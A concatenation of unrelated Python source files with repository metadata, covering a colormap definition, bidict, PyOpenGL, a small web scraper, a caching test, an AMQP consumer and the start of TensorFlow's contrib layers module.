[1., 0.713725, 0.],
[0.898039, 0.627451, 0.],
[0.898039, 0.611765, 0.],
[1., 0.662745, 0.],
[1., 0.647059, 0.],
[1., 0.631373, 0.],
[1., 0.615686, 0.],
[1., 0.6, 0.],
[1., 0.580392, 0.],
[1., 0.564706, 0.],
[1., 0.54902, 0.],
[0.898039, 0.478431, 0.],
[0.898039, 0.462745, 0.],
[1., 0.498039, 0.],
[1., 0.490196, 0.],
[1., 0.482353, 0.],
[1., 0.47451, 0.],
[1., 0.466667, 0.],
[1., 0.454902, 0.],
[1., 0.447059, 0.],
[1., 0.439216, 0.],
[0.898039, 0.388235, 0.],
[0.898039, 0.380392, 0.],
[1., 0.415686, 0.],
[1., 0.407843, 0.],
[1., 0.4, 0.],
[1., 0.388235, 0.],
[1., 0.380392, 0.],
[1., 0.372549, 0.],
[1., 0.364706, 0.],
[1., 0.356863, 0.],
[0.898039, 0.313725, 0.],
[0.898039, 0.305882, 0.],
[1., 0.329412, 0.],
[1., 0.321569, 0.],
[1., 0.313725, 0.],
[1., 0.305882, 0.],
[1., 0.298039, 0.],
[1., 0.290196, 0.],
[1., 0.282353, 0.],
[1., 0.27451, 0.],
[0.898039, 0.239216, 0.],
[0.898039, 0.231373, 0.],
[1., 0.247059, 0.],
[1., 0.239216, 0.],
[1., 0.231373, 0.],
[1., 0.223529, 0.],
[1., 0.215686, 0.],
[1., 0.207843, 0.],
[1., 0.196078, 0.],
[1., 0.188235, 0.],
[0.898039, 0.164706, 0.],
[0.898039, 0.156863, 0.],
[1., 0.164706, 0.],
[1., 0.156863, 0.],
[1., 0.14902, 0.],
[1., 0.141176, 0.],
[1., 0.129412, 0.],
[1., 0.121569, 0.],
[1., 0.113725, 0.],
[1., 0.105882, 0.],
[0.898039, 0.0862745, 0.],
[0.898039, 0.0823529, 0.],
[1., 0.0823529, 0.],
[1., 0.0745098, 0.],
[1., 0.0627451, 0.],
[1., 0.054902, 0.],
[1., 0.0470588, 0.],
[1., 0.0509804, 0.],
[1., 0.0313725, 0.],
[1., 0.0235294, 0.],
[0.898039, 0.0117647, 0.],
[0.898039, 0.00392157, 0.],
[1., 0., 0.],
[0.992157, 0., 0.],
[0.984314, 0., 0.],
[0.976471, 0., 0.],
[0.968627, 0., 0.],
[0.960784, 0., 0.],
[0.952941, 0., 0.],
[0.945098, 0., 0.],
[0.843137, 0., 0.],
[0.839216, 0., 0.],
[0.921569, 0., 0.],
[0.917647, 0., 0.],
[0.909804, 0., 0.],
[0.901961, 0., 0.],
[0.894118, 0., 0.],
[0.886275, 0., 0.],
[0.878431, 0., 0.],
[0.870588, 0., 0.],
[0.776471, 0., 0.],
[0.768627, 0., 0.],
[0.847059, 0., 0.],
[0.843137, 0., 0.],
[0.835294, 0., 0.],
[0.827451, 0., 0.],
[0.819608, 0., 0.],
[0.811765, 0., 0.],
[0.803922, 0., 0.],
[0.796078, 0., 0.],
[0.709804, 0., 0.],
[0.701961, 0., 0.],
[0.772549, 0., 0.],
[0.768627, 0., 0.],
[0.760784, 0., 0.],
[0.752941, 0., 0.],
[0.745098, 0., 0.],
[0.737255, 0., 0.],
[0.729412, 0., 0.],
[0.721569, 0., 0.],
[0.643137, 0., 0.],
[0.635294, 0., 0.],
[0.698039, 0., 0.],
[0.690196, 0., 0.],
[0.686275, 0., 0.],
[0.678431, 0., 0.],
[0.670588, 0., 0.],
[0.662745, 0., 0.],
[0.654902, 0., 0.],
[0.647059, 0., 0.],
[0.576471, 0., 0.],
[0.568627, 0., 0.],
[0.623529, 0., 0.],
[0.615686, 0., 0.],
[0.611765, 0., 0.],
[0.603922, 0., 0.],
[0.596078, 0., 0.],
[0.588235, 0., 0.],
[0.580392, 0., 0.],
[0.572549, 0., 0.],
[0.509804, 0., 0.],
[0.501961, 0., 0.],
[0.54902, 0., 0.],
[0.541176, 0., 0.],
[0.537255, 0., 0.],
[0.529412, 0., 0.],
[0.521569, 0., 0.],
[0.513725, 0., 0.],
[0.505882, 0., 0.],
[0.498039, 0., 0.],
[0.443137, 0., 0.],
[0.435294, 0., 0.],
[0.47451, 0., 0.],
[0.466667, 0., 0.],
[0.458824, 0., 0.],
[0.458824, 0., 0.]]
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show()
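# A minimal usage sketch (not part of the original file): renders some random
# sample data with the `test_cm` colormap defined above. The helper name and
# the data are illustrative assumptions; nothing here runs automatically.
def _demo_colormap(size=32):
    import matplotlib.pyplot as plt
    import numpy as np
    data = np.random.rand(size, size)
    plt.imshow(data, cmap=test_cm)
    plt.colorbar()
    plt.show()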
|
gpl-2.0
| -4,094,152,691,494,448,000 | 20.686131 | 69 | 0.49411 | false |
jab/bidict
|
bidict/_delegating.py
|
1
|
1313
|
# -*- coding: utf-8 -*-
# Copyright 2009-2021 Joshua Bronson. All Rights Reserved.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""Provide :class:`_DelegatingBidict`."""
import typing as _t
from ._base import BidictBase
from ._typing import KT, VT
class _DelegatingBidict(BidictBase[KT, VT]):
"""Provide optimized implementations of several methods by delegating to backing dicts.
Used to override less efficient implementations inherited by :class:`~collections.abc.Mapping`.
"""
__slots__ = ()
def __iter__(self) -> _t.Iterator[KT]:
"""Iterator over the contained keys."""
return iter(self._fwdm)
def keys(self) -> _t.KeysView[KT]:
"""A set-like object providing a view on the contained keys."""
return self._fwdm.keys()
def values(self) -> _t.KeysView[VT]: # type: ignore # https://github.com/python/typeshed/issues/4435
"""A set-like object providing a view on the contained values."""
return self._invm.keys()
def items(self) -> _t.ItemsView[KT, VT]:
"""A set-like object providing a view on the contained items."""
return self._fwdm.items()
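# Illustrative sketch (not part of this module): the public bidict classes build
# on this base, so their key/value/item views are the backing dicts' own views.
# The example only assumes the public ``bidict.bidict`` constructor.
def _delegation_demo() -> None:
    from bidict import bidict
    b = bidict(one=1, two=2)
    assert list(b.keys()) == ['one', 'two']    # keys come from the forward dict
    assert list(b.values()) == [1, 2]          # values are the inverse dict's keys
    assert ('one', 1) in b.items()             # items come from the forward dict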
|
mpl-2.0
| 6,723,408,480,734,901,000 | 32.666667 | 106 | 0.658797 | false |
frederica07/Dragon_Programming_Process
|
PyOpenGL-3.0.2/OpenGL/GL/VERSION/GL_1_3.py
|
1
|
1829
|
'''OpenGL extension VERSION.GL_1_3
This module customises the behaviour of the
OpenGL.raw.GL.VERSION.GL_1_3 to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/VERSION/GL_1_3.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.VERSION.GL_1_3 import *
### END AUTOGENERATED SECTION
from OpenGL.GL.VERSION.GL_1_3_images import *
GL_SRC0_ALPHA = GL_SOURCE0_ALPHA # alias
GL_SRC0_RGB = GL_SOURCE0_RGB # alias
GL_SRC1_ALPHA = GL_SOURCE1_ALPHA # alias
GL_SRC1_RGB = GL_SOURCE1_RGB # alias
GL_SRC2_ALPHA = GL_SOURCE2_ALPHA # alias
GL_SRC2_RGB = GL_SOURCE2_RGB # alias
for typ,arrayType in (
('d',arrays.GLdoubleArray),
('f',arrays.GLfloatArray),
('i',arrays.GLintArray),
('s',arrays.GLshortArray),
):
for size in (1,2,3,4):
name = 'glMultiTexCoord%(size)s%(typ)sv'%globals()
globals()[name] = arrays.setInputArraySizeType(
globals()[name],
size,
arrayType,
'v',
)
try:
del size,name
except NameError, err:
pass
try:
del typ,arrayType
except NameError, err:
pass
for typ,arrayType in (
('d',arrays.GLdoubleArray),
('f',arrays.GLfloatArray),
):
for function in ('glLoadTransposeMatrix','glMultTransposeMatrix'):
name = '%s%s'%(function,typ)
globals()[name] = arrays.setInputArraySizeType(
globals()[name],
16,
arrayType,
'm',
)
try:
del function,name
except NameError, err:
pass
try:
del typ,arrayType
except NameError, err:
pass
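# Illustrative sketch (not part of PyOpenGL): how the GL 1.3 multitexture entry
# points exposed above might be used while drawing. It assumes a current OpenGL
# context with textures bound to units 0 and 1, so it is not runnable standalone.
def _draw_multitextured_quad():
    from OpenGL.GL import glBegin, glEnd, glVertex2f, GL_QUADS
    glBegin(GL_QUADS)
    for x, y in ((0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)):
        glMultiTexCoord2f(GL_TEXTURE0, x, y)  # coordinates for texture unit 0
        glMultiTexCoord2f(GL_TEXTURE1, x, y)  # coordinates for texture unit 1
        glVertex2f(x, y)
    glEnd()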
|
bsd-2-clause
| 7,089,357,555,982,002,000 | 26.298507 | 70 | 0.618917 | false |
GFibrizo/TPS_7529
|
TP1/Estadistico de orden K/fuerza_bruta.py
|
1
|
1235
|
def es_estadistico_orden_k(conjunto, candidato, k):
menores = 0
for elem in conjunto:
if elem < candidato:
menores += 1
return menores == k
################################################################################
################################################################################
def obtener_estadistico_orden_k(conjunto, k):
for elemento in conjunto:
if es_estadistico_orden_k(conjunto, elemento, k):
return elemento
return None
################################################################################
################################################################################
def test():
print obtener_estadistico_orden_k([1], 0) == 1
print obtener_estadistico_orden_k([2,1], 1) == 2
print obtener_estadistico_orden_k([3,1,4,2,7], 3) == 4
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 0) == 1
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 7) == 8
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 4) == 5
################################################################################
################################################################################
test()
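################################################################################
# Cross-check sketch (not part of the original file): for inputs without
# repeated elements, the k-th order statistic is simply sorted(conjunto)[k],
# so the brute-force search above can be validated against it.
def verificar_contra_sorted(conjunto, k):
    return obtener_estadistico_orden_k(conjunto, k) == sorted(conjunto)[k]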
|
apache-2.0
| -2,356,529,184,397,459,000 | 38.83871 | 80 | 0.364372 | false |
google-research/google-research
|
nigt_optimizer/nigt_test.py
|
1
|
1295
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Test for nigt optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import test
from nigt_optimizer.nigt_optimizer import NIGTOptimizer
class NIGTOptimizerTest(test.TestCase):
def testRunsMinimize(self):
nigt = NIGTOptimizer(1.0)
w = tf.Variable([3.0])
loss = tf.square(w)
update_op = nigt.minimize(loss, var_list=[w])
if not tf.executing_eagerly():
self.evaluate(tf.initializers.global_variables())
for _ in range(3):
self.evaluate(update_op)
if __name__ == '__main__':
test.main()
|
apache-2.0
| -5,804,821,532,759,230,000 | 28.431818 | 74 | 0.722008 | false |
ifengkou/python_splider
|
history/smzdm_splider_re.py
|
1
|
4876
|
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
import string
import urllib2
import re
import json
class HTML_Tool:
    # Non-greedy match for \t, \n, \r, spaces, hyperlinks and images
BgnCharToNoneRex = re.compile("(\t|\n|\r| |<a.*?>|<img.*?>)")
    # Non-greedy match for any remaining <...> tag
EndCharToNoneRex = re.compile("<.*?>")
    # Non-greedy match for any <p> tag
BgnPartRex = re.compile("<p.*?>")
CharToNewLineRex =re.compile("(<br />|</p>|<tr>|<div>|</div>)")
CharToNewTabRex = re.compile("<td>")
    # Convert some HTML character entities back to their original symbols
    replaceTab = [("<","<"),(">",">"),("&","&"),(""","\""),(" "," ")]
def Replace_Char(self,x):
x = self.BgnCharToNoneRex.sub("",x)
x = self.BgnPartRex.sub("\n ",x)
x = self.CharToNewLineRex.sub("\n",x)
x = self.CharToNewTabRex.sub("\t",x)
x = self.EndCharToNoneRex.sub("",x)
for t in self.replaceTab:
x = x.replace(t[0],t[1])
return x
class Smzdm_Spider:
    # Declare the relevant attributes
def __init__(self,url):
self.myUrl = url
self.datas = []
self.myTool = HTML_Tool()
self.encoding = "utf-8"
        # Data structure for the category tags
        ## Tags have three levels, kept as a list of maps
        ## the backing store links levels via parentid
        self.categories = []
        print u'smzdm product wiki spider started, crunching away'
def spider_start(self):
        # Fetch the raw page and decode it with the configured encoding
user_agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
headers = { 'User-Agent' : user_agent }
req = urllib2.Request(self.myUrl, headers = headers)
# myPage = urllib2.urlopen(self.myUrl).read().decode(self.encoding)
myPage = urllib2.urlopen(req).read().decode(self.encoding)
        # Parse the categories
        self.get_categoris(myPage)
        # Print the categories (or store them)
print json.dumps(self.categories,ensure_ascii=False)
def get_categoris(self,myPage):
myMatch = re.search(r'ul id="left-category" class="category_box">(.*?)</ul>',myPage,re.S)
if myMatch:
            print u'Spider report: category info found'
category_content = myMatch.group(1)
self.hand_category(category_content)
else:
            print u'Spider report: no category info found'
def hand_category(self,content):
myItems = re.findall('<li class.*?>(.*?)</li>',content,re.S)
print len(myItems)
for item in myItems:
parentMatch = re.search(r'h2>.*?<a href=.*?>(.*?)</a>.*?</h2>',item,re.S)
if parentMatch:
parentItem = parentMatch.group(1)
categoryName = self.myTool.Replace_Char(parentItem.replace("\n","").encode(self.encoding))
subMatch = re.search(r'dl class="sub_category.*?>(.*?)</dl>',item,re.S)
if subMatch:
subItems = subMatch.group(1)
subs = self.hand_sub(subItems)
category = {}
category[categoryName] = subs
self.categories.append(category)
else:
                    print u'Spider report: no sub-category info found'
else:
                print u'Spider report: no parent category info found'
def hand_sub(self,content):
sub0s = self.hand_sub0(content)
sub1s = self.hand_sub1(content)
subs = []
if len(sub0s) == len(sub1s):
i = 0
for sub0 in sub0s:
sub_dict = {}
sub_dict[str(sub0)] = sub1s[i]
i += 1
subs.append(sub_dict)
else:
            print u'Second-level categories and their children have mismatched lengths'
return subs
def hand_sub0(self,content):
myItems = re.findall('<dt>.*?<a.*?>(.*?)</a>.*?</dt>',content,re.S)
sub0s = []
for item in myItems:
sub0s.append(self.myTool.Replace_Char(item.replace("\n","")))
return sub0s
def hand_sub1(self,content):
myItems = re.findall('<dd>(.*?)</dd>',content,re.S)
children = []
for item in myItems:
sub1s = []
myChildren = re.findall('<a.*?>(.*?)</a>',item,re.S)
for child in myChildren:
sub1s.append(self.myTool.Replace_Char(child.replace("\n","").encode(self.encoding)))
children.append(sub1s)
return children
# ---------- Entry point --------------
print """#----------------------------
# Program: smzdm spider
# Purpose: crawl featured product info from smzdm's wiki
#----------------------------------------
"""
# Wiki home page
url = 'http://wiki.smzdm.com/youxuan'
mySpider = Smzdm_Spider(url)
mySpider.spider_start()
|
mit
| 8,403,273,562,992,043,000 | 30.7 | 131 | 0.520955 | false |
ebilionis/variational-reformulation-of-inverse-problems
|
unittests/test_cached_function.py
|
1
|
1091
|
"""
Tests the vuq.CachedFunction decorator.
Author:
Ilias Bilionis
Date:
6/6/2014
"""
import numpy as np
import time
from vuq import *
# Test the evaluation of a cached and of an un-cached function
# An expensive function
def f(x):
for i in xrange(1000):
x += i
x /= 1000000
return 2. * x
#@CachedFunction()
def f_c(x):
return f(x)
class Foo(object):
def __init__(self):
self._f = f
def __call__(self, x):
return self._f(x)
class FooCached(object):
def __init__(self):
self._f = f
def __call__(self, x):
return self._f(x)
# A set of points to evaluate the function repeatedly
X = np.random.rand(10, 10)
# How many repetitions to do
num_repeat = 1000
F = Foo()
Fc = CachedFunction(F.__call__)
t0 = time.time()
for i in xrange(num_repeat):
y = F(X[i % X.shape[0], :])
t1 = time.time()
print 'Elapsed time without cache (seconds):', t1 - t0
t0 = time.time()
for i in xrange(num_repeat):
y = Fc(X[i % X.shape[0], :])
t1 = time.time()
print 'Elapsed time with cache (seconds):', t1 - t0
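# A generic memoization sketch (an assumption, not the actual vuq.CachedFunction
# implementation): results are cached on the raw bytes of the input array, which
# is the idea whose effect the two timing loops above compare.
def simple_cache(func):
    memo = {}
    def wrapper(x):
        key = np.asarray(x).tostring()  # hashable key built from the array contents
        if key not in memo:
            memo[key] = func(x)
        return memo[key]
    return wrapper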
|
gpl-2.0
| -7,619,550,343,440,725,000 | 15.283582 | 62 | 0.597617 | false |
kgiusti/gofer
|
src/gofer/messaging/consumer.py
|
1
|
4280
|
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from time import sleep
from logging import getLogger
from gofer.common import Thread, released
from gofer.messaging.model import DocumentError
from gofer.messaging.adapter.model import Reader
log = getLogger(__name__)
class ConsumerThread(Thread):
"""
An AMQP (abstract) consumer.
"""
def __init__(self, node, url, wait=3):
"""
:param node: An AMQP queue.
:type node: gofer.messaging.adapter.model.Node
:param url: The broker URL.
:type url: str
:param wait: Number of seconds to wait for a message.
:type wait: int
"""
Thread.__init__(self, name=node.name)
self.url = url
self.node = node
self.wait = wait
self.authenticator = None
self.reader = None
self.setDaemon(True)
def shutdown(self):
"""
Shutdown the consumer.
"""
self.abort()
@released
def run(self):
"""
Main consumer loop.
"""
self.reader = Reader(self.node, self.url)
self.reader.authenticator = self.authenticator
self.open()
try:
while not Thread.aborted():
self.read()
finally:
self.close()
def open(self):
"""
Open the reader.
"""
while not Thread.aborted():
try:
self.reader.open()
break
except Exception:
log.exception(self.getName())
sleep(30)
def close(self):
"""
Close the reader.
"""
try:
self.reader.close()
except Exception:
log.exception(self.getName())
def read(self):
"""
Read and process incoming documents.
"""
try:
wait = self.wait
reader = self.reader
message, document = reader.next(wait)
if message is None:
# wait expired
return
log.debug('{%s} read: %s', self.getName(), document)
self.dispatch(document)
message.ack()
except DocumentError, de:
self.rejected(de.code, de.description, de.document, de.details)
except Exception:
log.exception(self.getName())
sleep(60)
self.close()
self.open()
def rejected(self, code, description, document, details):
"""
Called to process the received (invalid) document.
This method intended to be overridden by subclasses.
:param code: The rejection code.
:type code: str
:param description: rejection description
:type description: str
:param document: The received *json* document.
:type document: str
:param details: The explanation.
:type details: str
"""
log.debug('rejected: %s', document)
def dispatch(self, document):
"""
Called to process the received document.
This method intended to be overridden by subclasses.
:param document: The received *json* document.
:type document: str
"""
log.debug('dispatched: %s', document)
class Consumer(ConsumerThread):
"""
An AMQP consumer.
Thread used to consumer messages from the specified queue.
On receipt, each message is used to build an document
and passed to dispatch().
"""
def __init__(self, node, url=None):
"""
:param node: The AMQP node.
:type node: gofer.messaging.adapter.model.Node
:param url: The broker URL.
:type url: str
"""
super(Consumer, self).__init__(node, url)
|
lgpl-2.1
| 7,477,042,401,144,376,000 | 27.918919 | 75 | 0.573598 | false |
HaebinShin/tensorflow
|
tensorflow/contrib/layers/python/layers/layers.py
|
1
|
58331
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Higher level ops for building layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import moving_averages
# TODO(b/28426988): Replace legacy_* fns migrated from slim.
# TODO(b/28426988): Remove legacy_* when all uses have migrated to new API.
__all__ = ['avg_pool2d',
'batch_norm',
'bias_add',
'conv2d',
'conv2d_in_plane',
'conv2d_transpose',
'convolution2d',
'convolution2d_in_plane',
'convolution2d_transpose',
'dropout',
'flatten',
'fully_connected',
'linear',
'max_pool2d',
'one_hot_encoding',
'relu',
'relu6',
'repeat',
'separable_conv2d',
'separable_convolution2d',
'softmax',
'stack',
'unit_norm',
'legacy_fully_connected',
'legacy_linear',
'legacy_relu']
@add_arg_scope
def avg_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
outputs_collections=None,
scope=None):
"""Adds a Avg Pooling op.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
"""
with ops.op_scope([inputs], scope, 'AvgPool2D') as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
outputs = nn.avg_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def batch_norm(inputs,
decay=0.999,
center=True,
scale=False,
epsilon=0.001,
activation_fn=None,
updates_collections=ops.GraphKeys.UPDATE_OPS,
is_training=True,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: a tensor of size `[batch_size, height, width, channels]`
or `[batch_size, channels]`.
decay: decay for the moving average.
center: If True, subtract `beta`. If False, `beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
epsilon: small float added to variance to avoid dividing by zero.
activation_fn: Optional activation function.
updates_collections: collections to collect the update ops for computation.
If None, a control dependency would be added to make sure the updates are
computed.
is_training: whether or not the layer is in training mode. In training mode
it would accumulate the statistics of the moments into `moving_mean` and
`moving_variance` using an exponential moving average with the given
`decay`. When it is not in training mode then it would use the values of
the `moving_mean` and the `moving_variance`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: if rank or last dimension of `inputs` is undefined.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'BatchNorm', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
axis = list(range(inputs_rank - 1))
params_shape = inputs_shape[-1:]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined last dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer,
collections=gamma_collections,
trainable=trainable)
# Create moving_mean and moving_variance variables and add them to the
    # appropriate collections.
moving_mean_collections = utils.get_variable_collections(
variables_collections, 'moving_mean')
moving_mean = variables.model_variable(
'moving_mean',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer,
trainable=False,
collections=moving_mean_collections)
moving_variance_collections = utils.get_variable_collections(
variables_collections, 'moving_variance')
moving_variance = variables.model_variable(
'moving_variance',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer,
trainable=False,
collections=moving_variance_collections)
is_training_value = utils.constant_value(is_training)
# Calculate the moments based on the individual batch.
need_moments = is_training_value is None or is_training_value
if need_moments:
mean, variance = nn.moments(inputs, axis, shift=moving_mean)
moving_vars_fn = lambda: (moving_mean, moving_variance)
if updates_collections is None:
def _force_updates():
"""Internal function forces updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
with ops.control_dependencies([update_moving_mean,
update_moving_variance]):
return array_ops.identity(mean), array_ops.identity(variance)
mean, variance = utils.smart_cond(is_training,
_force_updates,
moving_vars_fn)
else:
def _delay_updates():
"""Internal function that delay updates moving_vars if is_training."""
update_moving_mean = moving_averages.assign_moving_average(
moving_mean, mean, decay)
update_moving_variance = moving_averages.assign_moving_average(
moving_variance, variance, decay)
return update_moving_mean, update_moving_variance
update_mean, update_variance = utils.smart_cond(is_training,
_delay_updates,
moving_vars_fn)
ops.add_to_collections(updates_collections, update_mean)
ops.add_to_collections(updates_collections, update_variance)
# Use computed moments during training and moving_vars otherwise.
vars_fn = lambda: (mean, variance)
mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
else:
mean, variance = moving_mean, moving_variance
# Compute batch_normalization.
outputs = nn.batch_normalization(
inputs, mean, variance, beta, gamma, epsilon)
outputs.set_shape(inputs_shape)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def bias_add(inputs,
activation_fn=None,
initializer=init_ops.zeros_initializer,
regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a bias to the inputs.
Can be used as a normalizer function for conv2d and fully_connected.
Args:
    inputs: a tensor with at least rank 2 and a value for the last dimension,
e.g. `[batch_size, depth]`, `[None, None, None, depth]`.
activation_fn: Optional activation function.
initializer: An initializer for the bias, defaults to 0.
regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_op_scope.
Returns:
a tensor representing the result of adding biases to the inputs.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'BiasAdd', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
num_features = utils.last_dimension(inputs.get_shape(), min_rank=2)
biases_collections = utils.get_variable_collections(variables_collections,
'biases')
biases = variables.model_variable('biases',
shape=[num_features,],
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(inputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def convolution2d(inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
rate=1,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a 2D convolution followed by an optional batch_norm layer.
`convolution2d` creates a variable called `weights`, representing the
convolutional kernel, that is convolved with the `inputs` to produce a
`Tensor` of activations. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the activations. Finally, if `activation_fn` is not `None`,
it is applied to the activations as well.
Performs a'trous convolution with input stride equal to rate if rate is
greater than one.
Args:
inputs: a 4-D tensor `[batch_size, height, width, channels]`.
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 `[kernel_height, kernel_width]` of
      the filters. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of `VALID` or `SAME`.
rate: integer. If less than or equal to 1, a standard convolution is used.
      If greater than 1, then a'trous convolution is applied and `stride`
must be set to 1.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
